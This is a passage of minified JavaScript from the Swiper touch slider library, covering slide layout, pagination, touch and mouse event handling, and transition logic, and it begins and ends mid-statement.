b.rtl&&b.wrongRTL&&("slide"===b.params.effect||"coverflow"===b.params.effect)&&b.wrapper.css({width:b.virtualSize+b.params.spaceBetween+"px"}),b.support.flexbox&&!b.params.setWrapperSize||(b.isHorizontal()?b.wrapper.css({width:b.virtualSize+b.params.spaceBetween+"px"}):b.wrapper.css({height:b.virtualSize+b.params.spaceBetween+"px"})),1<b.params.slidesPerColumn&&(b.virtualSize=(a+b.params.spaceBetween)*s,b.virtualSize=Math.ceil(b.virtualSize/b.params.slidesPerColumn)-b.params.spaceBetween,b.isHorizontal()?b.wrapper.css({width:b.virtualSize+b.params.spaceBetween+"px"}):b.wrapper.css({height:b.virtualSize+b.params.spaceBetween+"px"}),b.params.centeredSlides)){for(r=[],e=0;e<b.snapGrid.length;e++)b.snapGrid[e]<b.virtualSize+b.snapGrid[0]&&r.push(b.snapGrid[e]);b.snapGrid=r}if(!b.params.centeredSlides){for(r=[],e=0;e<b.snapGrid.length;e++)b.snapGrid[e]<=b.virtualSize-b.size&&r.push(b.snapGrid[e]);b.snapGrid=r,1<Math.floor(b.virtualSize-b.size)-Math.floor(b.snapGrid[b.snapGrid.length-1])&&b.snapGrid.push(b.virtualSize-b.size)}0===b.snapGrid.length&&(b.snapGrid=[0]),0!==b.params.spaceBetween&&(b.isHorizontal()?b.rtl?b.slides.css({marginLeft:t+"px"}):b.slides.css({marginRight:t+"px"}):b.slides.css({marginBottom:t+"px"})),b.params.watchSlidesProgress&&b.updateSlidesOffset()}},b.updateSlidesOffset=function(){for(var e=0;e<b.slides.length;e++)b.slides[e].swiperSlideOffset=b.isHorizontal()?b.slides[e].offsetLeft:b.slides[e].offsetTop},b.updateSlidesProgress=function(e){if(void 0===e&&(e=b.translate||0),0!==b.slides.length){void 0===b.slides[0].swiperSlideOffset&&b.updateSlidesOffset();var t=-e;b.rtl&&(t=e),b.slides.removeClass(b.params.slideVisibleClass);for(var i=0;i<b.slides.length;i++){var n=b.slides[i],o=(t+(b.params.centeredSlides?b.minTranslate():0)-n.swiperSlideOffset)/(n.swiperSlideSize+b.params.spaceBetween);if(b.params.watchSlidesVisibility){var s=-(t-n.swiperSlideOffset),a=s+b.slidesSizesGrid[i];(0<=s&&s<b.size||0<a&&a<=b.size||s<=0&&a>=b.size)&&b.slides.eq(i).addClass(b.params.slideVisibleClass)}n.progress=b.rtl?-o:o}}},b.updateProgress=function(e){void 0===e&&(e=b.translate||0);var t=b.maxTranslate()-b.minTranslate(),i=b.isBeginning,n=b.isEnd;0===t?(b.progress=0,b.isBeginning=b.isEnd=!0):(b.progress=(e-b.minTranslate())/t,b.isBeginning=b.progress<=0,b.isEnd=1<=b.progress),b.isBeginning&&!i&&b.emit("onReachBeginning",b),b.isEnd&&!n&&b.emit("onReachEnd",b),b.params.watchSlidesProgress&&b.updateSlidesProgress(e),b.emit("onProgress",b,b.progress)},b.updateActiveIndex=function(){var e,t,i,n=b.rtl?b.translate:-b.translate;for(t=0;t<b.slidesGrid.length;t++)void 0!==b.slidesGrid[t+1]?n>=b.slidesGrid[t]&&n<b.slidesGrid[t+1]-(b.slidesGrid[t+1]-b.slidesGrid[t])/2?e=t:n>=b.slidesGrid[t]&&n<b.slidesGrid[t+1]&&(e=t+1):n>=b.slidesGrid[t]&&(e=t);b.params.normalizeSlideIndex&&(e<0||void 0===e)&&(e=0),(i=Math.floor(e/b.params.slidesPerGroup))>=b.snapGrid.length&&(i=b.snapGrid.length-1),e!==b.activeIndex&&(b.snapIndex=i,b.previousIndex=b.activeIndex,b.activeIndex=e,b.updateClasses(),b.updateRealIndex())},b.updateRealIndex=function(){b.realIndex=b.slides.eq(b.activeIndex).attr("data-swiper-slide-index")||b.activeIndex},b.updateClasses=function(){b.slides.removeClass(b.params.slideActiveClass+" "+b.params.slideNextClass+" "+b.params.slidePrevClass+" "+b.params.slideDuplicateActiveClass+" "+b.params.slideDuplicateNextClass+" "+b.params.slideDuplicatePrevClass);var e=b.slides.eq(b.activeIndex);e.addClass(b.params.slideActiveClass),l.loop&&(e.hasClass(b.params.slideDuplicateClass)?b.wrapper.children("."+b.params.slideClass+":not(."+b.params.slideDuplicateClass+')[data-swiper-slide-index="'+b.realIndex+'"]').addClass(b.params.slideDuplicateActiveClass):b.wrapper.children("."+b.params.slideClass+"."+b.params.slideDuplicateClass+'[data-swiper-slide-index="'+b.realIndex+'"]').addClass(b.params.slideDuplicateActiveClass));var t=e.next("."+b.params.slideClass).addClass(b.params.slideNextClass);b.params.loop&&0===t.length&&(t=b.slides.eq(0)).addClass(b.params.slideNextClass);var i=e.prev("."+b.params.slideClass).addClass(b.params.slidePrevClass);if(b.params.loop&&0===i.length&&(i=b.slides.eq(-1)).addClass(b.params.slidePrevClass),l.loop&&(t.hasClass(b.params.slideDuplicateClass)?b.wrapper.children("."+b.params.slideClass+":not(."+b.params.slideDuplicateClass+')[data-swiper-slide-index="'+t.attr("data-swiper-slide-index")+'"]').addClass(b.params.slideDuplicateNextClass):b.wrapper.children("."+b.params.slideClass+"."+b.params.slideDuplicateClass+'[data-swiper-slide-index="'+t.attr("data-swiper-slide-index")+'"]').addClass(b.params.slideDuplicateNextClass),i.hasClass(b.params.slideDuplicateClass)?b.wrapper.children("."+b.params.slideClass+":not(."+b.params.slideDuplicateClass+')[data-swiper-slide-index="'+i.attr("data-swiper-slide-index")+'"]').addClass(b.params.slideDuplicatePrevClass):b.wrapper.children("."+b.params.slideClass+"."+b.params.slideDuplicateClass+'[data-swiper-slide-index="'+i.attr("data-swiper-slide-index")+'"]').addClass(b.params.slideDuplicatePrevClass)),b.paginationContainer&&0<b.paginationContainer.length){var n,o=b.params.loop?Math.ceil((b.slides.length-2*b.loopedSlides)/b.params.slidesPerGroup):b.snapGrid.length;if(b.params.loop?((n=Math.ceil((b.activeIndex-b.loopedSlides)/b.params.slidesPerGroup))>b.slides.length-1-2*b.loopedSlides&&(n-=b.slides.length-2*b.loopedSlides),o-1<n&&(n-=o),n<0&&"bullets"!==b.params.paginationType&&(n=o+n)):n=void 0!==b.snapIndex?b.snapIndex:b.activeIndex||0,"bullets"===b.params.paginationType&&b.bullets&&0<b.bullets.length&&(b.bullets.removeClass(b.params.bulletActiveClass),1<b.paginationContainer.length?b.bullets.each(function(){D(this).index()===n&&D(this).addClass(b.params.bulletActiveClass)}):b.bullets.eq(n).addClass(b.params.bulletActiveClass)),"fraction"===b.params.paginationType&&(b.paginationContainer.find("."+b.params.paginationCurrentClass).text(n+1),b.paginationContainer.find("."+b.params.paginationTotalClass).text(o)),"progress"===b.params.paginationType){var s=(n+1)/o,a=s,r=1;b.isHorizontal()||(r=s,a=1),b.paginationContainer.find("."+b.params.paginationProgressbarClass).transform("translate3d(0,0,0) scaleX("+a+") scaleY("+r+")").transition(b.params.speed)}"custom"===b.params.paginationType&&b.params.paginationCustomRender&&(b.paginationContainer.html(b.params.paginationCustomRender(b,n+1,o)),b.emit("onPaginationRendered",b,b.paginationContainer[0]))}b.params.loop||(b.params.prevButton&&b.prevButton&&0<b.prevButton.length&&(b.isBeginning?(b.prevButton.addClass(b.params.buttonDisabledClass),b.params.a11y&&b.a11y&&b.a11y.disable(b.prevButton)):(b.prevButton.removeClass(b.params.buttonDisabledClass),b.params.a11y&&b.a11y&&b.a11y.enable(b.prevButton))),b.params.nextButton&&b.nextButton&&0<b.nextButton.length&&(b.isEnd?(b.nextButton.addClass(b.params.buttonDisabledClass),b.params.a11y&&b.a11y&&b.a11y.disable(b.nextButton)):(b.nextButton.removeClass(b.params.buttonDisabledClass),b.params.a11y&&b.a11y&&b.a11y.enable(b.nextButton))))},b.updatePagination=function(){if(b.params.pagination&&b.paginationContainer&&0<b.paginationContainer.length){var e="";if("bullets"===b.params.paginationType){for(var t=b.params.loop?Math.ceil((b.slides.length-2*b.loopedSlides)/b.params.slidesPerGroup):b.snapGrid.length,i=0;i<t;i++)b.params.paginationBulletRender?e+=b.params.paginationBulletRender(b,i,b.params.bulletClass):e+="<"+b.params.paginationElement+' class="'+b.params.bulletClass+'"></'+b.params.paginationElement+">";b.paginationContainer.html(e),b.bullets=b.paginationContainer.find("."+b.params.bulletClass),b.params.paginationClickable&&b.params.a11y&&b.a11y&&b.a11y.initPagination()}"fraction"===b.params.paginationType&&(e=b.params.paginationFractionRender?b.params.paginationFractionRender(b,b.params.paginationCurrentClass,b.params.paginationTotalClass):'<span class="'+b.params.paginationCurrentClass+'"></span> / <span class="'+b.params.paginationTotalClass+'"></span>',b.paginationContainer.html(e)),"progress"===b.params.paginationType&&(e=b.params.paginationProgressRender?b.params.paginationProgressRender(b,b.params.paginationProgressbarClass):'<span class="'+b.params.paginationProgressbarClass+'"></span>',b.paginationContainer.html(e)),"custom"!==b.params.paginationType&&b.emit("onPaginationRendered",b,b.paginationContainer[0])}},b.update=function(e){function t(){b.rtl,b.translate;i=Math.min(Math.max(b.translate,b.maxTranslate()),b.minTranslate()),b.setWrapperTranslate(i),b.updateActiveIndex(),b.updateClasses()}var i;(b.updateContainerSize(),b.updateSlidesSize(),b.updateProgress(),b.updatePagination(),b.updateClasses(),b.params.scrollbar&&b.scrollbar&&b.scrollbar.set(),e)?(b.controller&&b.controller.spline&&(b.controller.spline=void 0),b.params.freeMode?(t(),b.params.autoHeight&&b.updateAutoHeight()):(("auto"===b.params.slidesPerView||1<b.params.slidesPerView)&&b.isEnd&&!b.params.centeredSlides?b.slideTo(b.slides.length-1,0,!1,!0):b.slideTo(b.activeIndex,0,!1,!0))||t()):b.params.autoHeight&&b.updateAutoHeight()},b.onResize=function(e){b.params.breakpoints&&b.setBreakpoint();var t=b.params.allowSwipeToPrev,i=b.params.allowSwipeToNext;b.params.allowSwipeToPrev=b.params.allowSwipeToNext=!0,b.updateContainerSize(),b.updateSlidesSize(),("auto"===b.params.slidesPerView||b.params.freeMode||e)&&b.updatePagination(),b.params.scrollbar&&b.scrollbar&&b.scrollbar.set(),b.controller&&b.controller.spline&&(b.controller.spline=void 0);var n=!1;if(b.params.freeMode){var o=Math.min(Math.max(b.translate,b.maxTranslate()),b.minTranslate());b.setWrapperTranslate(o),b.updateActiveIndex(),b.updateClasses(),b.params.autoHeight&&b.updateAutoHeight()}else b.updateClasses(),n=("auto"===b.params.slidesPerView||1<b.params.slidesPerView)&&b.isEnd&&!b.params.centeredSlides?b.slideTo(b.slides.length-1,0,!1,!0):b.slideTo(b.activeIndex,0,!1,!0);b.params.lazyLoading&&!n&&b.lazy&&b.lazy.load(),b.params.allowSwipeToPrev=t,b.params.allowSwipeToNext=i},b.touchEventsDesktop={start:"mousedown",move:"mousemove",end:"mouseup"},window.navigator.pointerEnabled?b.touchEventsDesktop={start:"pointerdown",move:"pointermove",end:"pointerup"}:window.navigator.msPointerEnabled&&(b.touchEventsDesktop={start:"MSPointerDown",move:"MSPointerMove",end:"MSPointerUp"}),b.touchEvents={start:b.support.touch||!b.params.simulateTouch?"touchstart":b.touchEventsDesktop.start,move:b.support.touch||!b.params.simulateTouch?"touchmove":b.touchEventsDesktop.move,end:b.support.touch||!b.params.simulateTouch?"touchend":b.touchEventsDesktop.end},(window.navigator.pointerEnabled||window.navigator.msPointerEnabled)&&("container"===b.params.touchEventsTarget?b.container:b.wrapper).addClass("swiper-wp8-"+b.params.direction),b.initEvents=function(e){var t=e?"off":"on",i=e?"removeEventListener":"addEventListener",n="container"===b.params.touchEventsTarget?b.container[0]:b.wrapper[0],o=b.support.touch?n:document,s=!!b.params.nested;if(b.browser.ie)n[i](b.touchEvents.start,b.onTouchStart,!1),o[i](b.touchEvents.move,b.onTouchMove,s),o[i](b.touchEvents.end,b.onTouchEnd,!1);else{if(b.support.touch){var a=!("touchstart"!==b.touchEvents.start||!b.support.passiveListener||!b.params.passiveListeners)&&{passive:!0,capture:!1};n[i](b.touchEvents.start,b.onTouchStart,a),n[i](b.touchEvents.move,b.onTouchMove,s),n[i](b.touchEvents.end,b.onTouchEnd,a)}(l.simulateTouch&&!b.device.ios&&!b.device.android||l.simulateTouch&&!b.support.touch&&b.device.ios)&&(n[i]("mousedown",b.onTouchStart,!1),document[i]("mousemove",b.onTouchMove,s),document[i]("mouseup",b.onTouchEnd,!1))}window[i]("resize",b.onResize),b.params.nextButton&&b.nextButton&&0<b.nextButton.length&&(b.nextButton[t]("click",b.onClickNext),b.params.a11y&&b.a11y&&b.nextButton[t]("keydown",b.a11y.onEnterKey)),b.params.prevButton&&b.prevButton&&0<b.prevButton.length&&(b.prevButton[t]("click",b.onClickPrev),b.params.a11y&&b.a11y&&b.prevButton[t]("keydown",b.a11y.onEnterKey)),b.params.pagination&&b.params.paginationClickable&&(b.paginationContainer[t]("click","."+b.params.bulletClass,b.onClickIndex),b.params.a11y&&b.a11y&&b.paginationContainer[t]("keydown","."+b.params.bulletClass,b.a11y.onEnterKey)),(b.params.preventClicks||b.params.preventClicksPropagation)&&n[i]("click",b.preventClicks,!0)},b.attachEvents=function(){b.initEvents()},b.detachEvents=function(){b.initEvents(!0)},b.allowClick=!0,b.preventClicks=function(e){b.allowClick||(b.params.preventClicks&&e.preventDefault(),b.params.preventClicksPropagation&&b.animating&&(e.stopPropagation(),e.stopImmediatePropagation()))},b.onClickNext=function(e){e.preventDefault(),b.isEnd&&!b.params.loop||b.slideNext()},b.onClickPrev=function(e){e.preventDefault(),b.isBeginning&&!b.params.loop||b.slidePrev()},b.onClickIndex=function(e){e.preventDefault();var t=D(this).index()*b.params.slidesPerGroup;b.params.loop&&(t+=b.loopedSlides),b.slideTo(t)},b.updateClickedSlide=function(e){var t=a(e,"."+b.params.slideClass),i=!1;if(t)for(var n=0;n<b.slides.length;n++)b.slides[n]===t&&(i=!0);if(!t||!i)return b.clickedSlide=void 0,void(b.clickedIndex=void 0);if(b.clickedSlide=t,b.clickedIndex=D(t).index(),b.params.slideToClickedSlide&&void 0!==b.clickedIndex&&b.clickedIndex!==b.activeIndex){var o,s=b.clickedIndex;if(b.params.loop){if(b.animating)return;o=D(b.clickedSlide).attr("data-swiper-slide-index"),b.params.centeredSlides?s<b.loopedSlides-b.params.slidesPerView/2||s>b.slides.length-b.loopedSlides+b.params.slidesPerView/2?(b.fixLoop(),s=b.wrapper.children("."+b.params.slideClass+'[data-swiper-slide-index="'+o+'"]:not(.'+b.params.slideDuplicateClass+")").eq(0).index(),setTimeout(function(){b.slideTo(s)},0)):b.slideTo(s):s>b.slides.length-b.params.slidesPerView?(b.fixLoop(),s=b.wrapper.children("."+b.params.slideClass+'[data-swiper-slide-index="'+o+'"]:not(.'+b.params.slideDuplicateClass+")").eq(0).index(),setTimeout(function(){b.slideTo(s)},0)):b.slideTo(s)}else b.slideTo(s)}};var _,x,C,$,y,k,T,w,S,z,E,O,P="input, select, textarea, button, video",I=Date.now(),M=[];for(var A in b.animating=!1,b.touches={startX:0,startY:0,currentX:0,currentY:0,diff:0},b.onTouchStart=function(e){if(e.originalEvent&&(e=e.originalEvent),(E="touchstart"===e.type)||!("which"in e)||3!==e.which)if(b.params.noSwiping&&a(e,"."+b.params.noSwipingClass))b.allowClick=!0;else if(!b.params.swipeHandler||a(e,b.params.swipeHandler)){var t=b.touches.currentX="touchstart"===e.type?e.targetTouches[0].pageX:e.pageX,i=b.touches.currentY="touchstart"===e.type?e.targetTouches[0].pageY:e.pageY;if(!(b.device.ios&&b.params.iOSEdgeSwipeDetection&&t<=b.params.iOSEdgeSwipeThreshold)){if(C=!(x=!(_=!0)),O=y=void 0,b.touches.startX=t,b.touches.startY=i,$=Date.now(),b.allowClick=!0,b.updateContainerSize(),b.swipeDirection=void 0,0<b.params.threshold&&(w=!1),"touchstart"!==e.type){var n=!0;D(e.target).is(P)&&(n=!1),document.activeElement&&D(document.activeElement).is(P)&&document.activeElement.blur(),n&&e.preventDefault()}b.emit("onTouchStart",b,e)}}},b.onTouchMove=function(e){if(e.originalEvent&&(e=e.originalEvent),!E||"mousemove"!==e.type){if(e.preventedByNestedSwiper)return b.touches.startX="touchmove"===e.type?e.targetTouches[0].pageX:e.pageX,void(b.touches.startY="touchmove"===e.type?e.targetTouches[0].pageY:e.pageY);if(b.params.onlyExternal)return b.allowClick=!1,void(_&&(b.touches.startX=b.touches.currentX="touchmove"===e.type?e.targetTouches[0].pageX:e.pageX,b.touches.startY=b.touches.currentY="touchmove"===e.type?e.targetTouches[0].pageY:e.pageY,$=Date.now()));if(E&&b.params.touchReleaseOnEdges&&!b.params.loop)if(b.isHorizontal()){if(b.touches.currentX<b.touches.startX&&b.translate<=b.maxTranslate()||b.touches.currentX>b.touches.startX&&b.translate>=b.minTranslate())return}else if(b.touches.currentY<b.touches.startY&&b.translate<=b.maxTranslate()||b.touches.currentY>b.touches.startY&&b.translate>=b.minTranslate())return;if(E&&document.activeElement&&e.target===document.activeElement&&D(e.target).is(P))return x=!0,void(b.allowClick=!1);if(C&&b.emit("onTouchMove",b,e),!(e.targetTouches&&1<e.targetTouches.length)){var t;if(b.touches.currentX="touchmove"===e.type?e.targetTouches[0].pageX:e.pageX,b.touches.currentY="touchmove"===e.type?e.targetTouches[0].pageY:e.pageY,void 0===y)b.isHorizontal()&&b.touches.currentY===b.touches.startY||!b.isHorizontal()&&b.touches.currentX!==b.touches.startX?y=!1:(t=180*Math.atan2(Math.abs(b.touches.currentY-b.touches.startY),Math.abs(b.touches.currentX-b.touches.startX))/Math.PI,y=b.isHorizontal()?t>b.params.touchAngle:90-t>b.params.touchAngle);if(y&&b.emit("onTouchMoveOpposite",b,e),void 0===O&&b.browser.ieTouch&&(b.touches.currentX===b.touches.startX&&b.touches.currentY===b.touches.startY||(O=!0)),_)if(y)_=!1;else if(O||!b.browser.ieTouch){b.allowClick=!1,b.emit("onSliderMove",b,e),e.preventDefault(),b.params.touchMoveStopPropagation&&!b.params.nested&&e.stopPropagation(),x||(l.loop&&b.fixLoop(),T=b.getWrapperTranslate(),b.setWrapperTransition(0),b.animating&&b.wrapper.trigger("webkitTransitionEnd transitionend oTransitionEnd MSTransitionEnd msTransitionEnd"),b.params.autoplay&&b.autoplaying&&(b.params.autoplayDisableOnInteraction?b.stopAutoplay():b.pauseAutoplay()),z=!1,!b.params.grabCursor||!0!==b.params.allowSwipeToNext&&!0!==b.params.allowSwipeToPrev||b.setGrabCursor(!0)),x=!0;var i=b.touches.diff=b.isHorizontal()?b.touches.currentX-b.touches.startX:b.touches.currentY-b.touches.startY;i*=b.params.touchRatio,b.rtl&&(i=-i),b.swipeDirection=0<i?"prev":"next",k=i+T;var n=!0;if(0<i&&k>b.minTranslate()?(n=!1,b.params.resistance&&(k=b.minTranslate()-1+Math.pow(-b.minTranslate()+T+i,b.params.resistanceRatio))):i<0&&k<b.maxTranslate()&&(n=!1,b.params.resistance&&(k=b.maxTranslate()+1-Math.pow(b.maxTranslate()-T-i,b.params.resistanceRatio))),n&&(e.preventedByNestedSwiper=!0),!b.params.allowSwipeToNext&&"next"===b.swipeDirection&&k<T&&(k=T),!b.params.allowSwipeToPrev&&"prev"===b.swipeDirection&&T<k&&(k=T),0<b.params.threshold){if(!(Math.abs(i)>b.params.threshold||w))return void(k=T);if(!w)return w=!0,b.touches.startX=b.touches.currentX,b.touches.startY=b.touches.currentY,k=T,void(b.touches.diff=b.isHorizontal()?b.touches.currentX-b.touches.startX:b.touches.currentY-b.touches.startY)}b.params.followFinger&&((b.params.freeMode||b.params.watchSlidesProgress)&&b.updateActiveIndex(),b.params.freeMode&&(0===M.length&&M.push({position:b.touches[b.isHorizontal()?"startX":"startY"],time:$}),M.push({position:b.touches[b.isHorizontal()?"currentX":"currentY"],time:(new window.Date).getTime()})),b.updateProgress(k),b.setWrapperTranslate(k))}}}},b.onTouchEnd=function(e){if(e.originalEvent&&(e=e.originalEvent),C&&b.emit("onTouchEnd",b,e),C=!1,_){b.params.grabCursor&&x&&_&&(!0===b.params.allowSwipeToNext||!0===b.params.allowSwipeToPrev)&&b.setGrabCursor(!1);var t,i=Date.now(),n=i-$;if(b.allowClick&&(b.updateClickedSlide(e),b.emit("onTap",b,e),n<300&&300<i-I&&(S&&clearTimeout(S),S=setTimeout(function(){b&&(b.params.paginationHide&&0<b.paginationContainer.length&&!D(e.target).hasClass(b.params.bulletClass)&&b.paginationContainer.toggleClass(b.params.paginationHiddenClass),b.emit("onClick",b,e))},300)),n<300&&i-I<300&&(S&&clearTimeout(S),b.emit("onDoubleTap",b,e))),I=Date.now(),setTimeout(function(){b&&(b.allowClick=!0)},0),_&&x&&b.swipeDirection&&0!==b.touches.diff&&k!==T)if(_=x=!1,t=b.params.followFinger?b.rtl?b.translate:-b.translate:-k,b.params.freeMode){if(t<-b.minTranslate())return void b.slideTo(b.activeIndex);if(t>-b.maxTranslate())return void(b.slides.length<b.snapGrid.length?b.slideTo(b.snapGrid.length-1):b.slideTo(b.slides.length-1));if(b.params.freeModeMomentum){if(1<M.length){var o=M.pop(),s=M.pop(),a=o.position-s.position,r=o.time-s.time;b.velocity=a/r,b.velocity=b.velocity/2,Math.abs(b.velocity)<b.params.freeModeMinimumVelocity&&(b.velocity=0),(150<r||300<(new window.Date).getTime()-o.time)&&(b.velocity=0)}else b.velocity=0;b.velocity=b.velocity*b.params.freeModeMomentumVelocityRatio,M.length=0;var l=1e3*b.params.freeModeMomentumRatio,c=b.velocity*l,u=b.translate+c;b.rtl&&(u=-u);var d,h=!1,p=20*Math.abs(b.velocity)*b.params.freeModeMomentumBounceRatio;if(u<b.maxTranslate())b.params.freeModeMomentumBounce?(u+b.maxTranslate()<-p&&(u=b.maxTranslate()-p),d=b.maxTranslate(),z=h=!0):u=b.maxTranslate();else if(u>b.minTranslate())b.params.freeModeMomentumBounce?(u-b.minTranslate()>p&&(u=b.minTranslate()+p),d=b.minTranslate(),z=h=!0):u=b.minTranslate();else if(b.params.freeModeSticky){var f,m=0;for(m=0;m<b.snapGrid.length;m+=1)if(b.snapGrid[m]>-u){f=m;break}u=Math.abs(b.snapGrid[f]-u)<Math.abs(b.snapGrid[f-1]-u)||"next"===b.swipeDirection?b.snapGrid[f]:b.snapGrid[f-1],b.rtl||(u=-u)}if(0!==b.velocity)l=b.rtl?Math.abs((-u-b.translate)/b.velocity):Math.abs((u-b.translate)/b.velocity);else if(b.params.freeModeSticky)return void b.slideReset();b.params.freeModeMomentumBounce&&h?(b.updateProgress(d),b.setWrapperTransition(l),b.setWrapperTranslate(u),b.onTransitionStart(),b.animating=!0,b.wrapper.transitionEnd(function(){b&&z&&(b.emit("onMomentumBounce",b),b.setWrapperTransition(b.params.speed),b.setWrapperTranslate(d),b.wrapper.transitionEnd(function(){b&&b.onTransitionEnd()}))})):b.velocity?(b.updateProgress(u),b.setWrapperTransition(l),b.setWrapperTranslate(u),b.onTransitionStart(),b.animating||(b.animating=!0,b.wrapper.transitionEnd(function(){b&&b.onTransitionEnd()}))):b.updateProgress(u),b.updateActiveIndex()}(!b.params.freeModeMomentum||n>=b.params.longSwipesMs)&&(b.updateProgress(),b.updateActiveIndex())}else{var g,v=0,y=b.slidesSizesGrid[0];for(g=0;g<b.slidesGrid.length;g+=b.params.slidesPerGroup)void 0!==b.slidesGrid[g+b.params.slidesPerGroup]?t>=b.slidesGrid[g]&&t<b.slidesGrid[g+b.params.slidesPerGroup]&&(v=g,y=b.slidesGrid[g+b.params.slidesPerGroup]-b.slidesGrid[g]):t>=b.slidesGrid[g]&&(v=g,y=b.slidesGrid[b.slidesGrid.length-1]-b.slidesGrid[b.slidesGrid.length-2]);var w=(t-b.slidesGrid[v])/y;if(n>b.params.longSwipesMs){if(!b.params.longSwipes)return void b.slideTo(b.activeIndex);"next"===b.swipeDirection&&(w>=b.params.longSwipesRatio?b.slideTo(v+b.params.slidesPerGroup):b.slideTo(v)),"prev"===b.swipeDirection&&(w>1-b.params.longSwipesRatio?b.slideTo(v+b.params.slidesPerGroup):b.slideTo(v))}else{if(!b.params.shortSwipes)return void b.slideTo(b.activeIndex);"next"===b.swipeDirection&&b.slideTo(v+b.params.slidesPerGroup),"prev"===b.swipeDirection&&b.slideTo(v)}}else _=x=!1}},b._slideTo=function(e,t){return b.slideTo(e,t,!0,!0)},b.slideTo=function(e,t,i,n){void 0===i&&(i=!0),void 0===e&&(e=0),e<0&&(e=0),b.snapIndex=Math.floor(e/b.params.slidesPerGroup),b.snapIndex>=b.snapGrid.length&&(b.snapIndex=b.snapGrid.length-1);var o=-b.snapGrid[b.snapIndex];if(b.params.autoplay&&b.autoplaying&&(n||!b.params.autoplayDisableOnInteraction?b.pauseAutoplay(t):b.stopAutoplay()),b.updateProgress(o),b.params.normalizeSlideIndex)for(var s=0;s<b.slidesGrid.length;s++)-Math.floor(100*o)>=Math.floor(100*b.slidesGrid[s])&&(e=s);return!(!b.params.allowSwipeToNext&&o<b.translate&&o<b.minTranslate())&&(!(!b.params.allowSwipeToPrev&&o>b.translate&&o>b.maxTranslate()&&(b.activeIndex||0)!==e)&&(void 0===t&&(t=b.params.speed),b.previousIndex=b.activeIndex||0,b.activeIndex=e,b.updateRealIndex(),b.rtl&&-o===b.translate||!b.rtl&&o===b.translate?(b.params.autoHeight&&b.updateAutoHeight(),b.updateClasses(),"slide"!==b.params.effect&&b.setWrapperTranslate(o),!1):(b.updateClasses(),b.onTransitionStart(i),0===t||b.browser.lteIE9?(b.setWrapperTranslate(o),b.setWrapperTransition(0),b.onTransitionEnd(i)):(b.setWrapperTranslate(o),b.setWrapperTransition(t),b.animating||(b.animating=!0,b.wrapper.transitionEnd(function(){b&&b.onTransitionEnd(i)}))),!0)))},b.onTransitionStart=function(e){void 0===e&&(e=!0),b.params.autoHeight&&b.updateAutoHeight(),b.lazy&&b.lazy.onTransitionStart(),e&&(b.emit("onTransitionStart",b),b.activeIndex!==b.previousIndex&&(b.emit("onSlideChangeStart",b),b.activeIndex>b.previousIndex?b.emit("onSlideNextStart",b):b.emit("onSlidePrevStart",b)))},b.onTransitionEnd=function(e){b.animating=!1,b.setWrapperTransition(0),void 0===e&&(e=!0),b.lazy&&b.lazy.onTransitionEnd(),e&&(b.emit("onTransitionEnd",b),b.activeIndex!==b.previousIndex&&(b.emit("onSlideChangeEnd",b),b.activeIndex>b.previousIndex?b.emit("onSlideNextEnd",b):b.emit("onSlidePrevEnd",b))),b.params.history&&b.history&&b.history.setHistory(b.params.history,b.activeIndex),b.params.hashnav&&b.hashnav&&b.hashnav.setHash()},b.slideNext=function(e,t,i){if(b.params.loop){if(b.animating)return!1;b.fixLoop();b.container[0].clientLeft;return b.slideTo(b.activeIndex+b.params.slidesPerGroup,t,e,i)}return b.slideTo(b.activeIndex+b.params.slidesPerGroup,t,e,i)},b._slideNext=function(e){return b.slideNext(!0,e,!0)},b.slidePrev=function(e,t,i){if(b.params.loop){if(b.animating)return!1;b.fixLoop();b.container[0].clientLeft;return b.slideTo(b.activeIndex-1,t,e,i)}return b.slideTo(b.activeIndex-1,t,e,i)},b._slidePrev=function(e){return b.slidePrev(!0,e,!0)},b.slideReset=function(e,t,i){return b.slideTo(b.activeIndex,t,e)},b.disableTouchControl=function(){return b.params.onlyExternal=!0},b.enableTouchControl=function(){return!(b.params.onlyExternal=!1)},b.setWrapperTransition=function(e,t){b.wrapper.transition(e),"slide"!==b.params.effect&&b.effects[b.params.effect]&&b.effects[b.params.effect].setTransition(e),b.params.parallax&&b.parallax&&b.parallax.setTransition(e),b.params.scrollbar&&b.scrollbar&&b.scrollbar.setTransition(e),b.params.control&&b.controller&&b.controller.setTransition(e,t),b.emit("onSetTransition",b,e)},b.setWrapperTranslate=function(e,t,i){var n=0,o=0;b.isHorizontal()?n=b.rtl?-e:e:o=e,b.params.roundLengths&&(n=m(n),o=m(o)),b.params.virtualTranslate||(b.support.transforms3d?b.wrapper.transform("translate3d("+n+"px, "+o+"px, 0px)"):b.wrapper.transform("translate("+n+"px, "+o+"px)")),b.translate=b.isHorizontal()?n:o;var s=b.maxTranslate()-b.minTranslate();(0===s?0:(e-b.minTranslate())/s)!==b.progress&&b.updateProgress(e),t&&b.updateActiveIndex(),"slide"!==b.params.effect&&b.effects[b.params.effect]&&b.effects[b.params.effect].setTranslate(b.translate),b.params.parallax&&b.parallax&&b.parallax.setTranslate(b.translate),b.params.scrollbar&&b.scrollbar&&b.scrollbar.setTranslate(b.translate),b.params.control&&b.controller&&b.controller.setTranslate(b.translate,i),b.emit("onSetTranslate",b,b.translate)},b.getTranslate=function(e,t){var i,n,o,s;return void 0===t&&(t="x"),b.params.virtualTranslate?b.rtl?-b.translate:b.translate:(o=window.getComputedStyle(e,null),window.WebKitCSSMatrix?(6<(n=o.transform||o.webkitTransform).split(",").length&&(n=n.split(", ").map(function(e){return e.replace(",",".")}).join(", ")),s=new window.WebKitCSSMatrix("none"===n?"":n)):i=(s=o.MozTransform||o.OTransform||o.MsTransform||o.msTransform||o.transform||o.getPropertyValue("transform").replace("translate(","matrix(1, 0, 0, 1,")).toString().split(","),"x"===t&&(n=window.WebKitCSSMatrix?s.m41:16===i.length?parseFloat(i[12]):parseFloat(i[4])),"y"===t&&(n=window.WebKitCSSMatrix?s.m42:16===i.length?parseFloat(i[13]):parseFloat(i[5])),b.rtl&&n&&(n=-n),n||0)},b.getWrapperTranslate=function(e){return void 0===e&&(e=b.isHorizontal()?"x":"y"),b.getTranslate(b.wrapper[0],e)},b.observers=[],b.initObservers=function(){if(b.params.observeParents)for(var e=b.container.parents(),t=0;t<e.length;t++)i(e[t]);i(b.container[0],{childList:!1}),i(b.wrapper[0],{attributes:!1})},b.disconnectObservers=function(){for(var e=0;e<b.observers.length;e++)b.observers[e].disconnect();b.observers=[]},b.createLoop=function(){b.wrapper.children("."+b.params.slideClass+"."+b.params.slideDuplicateClass).remove();var 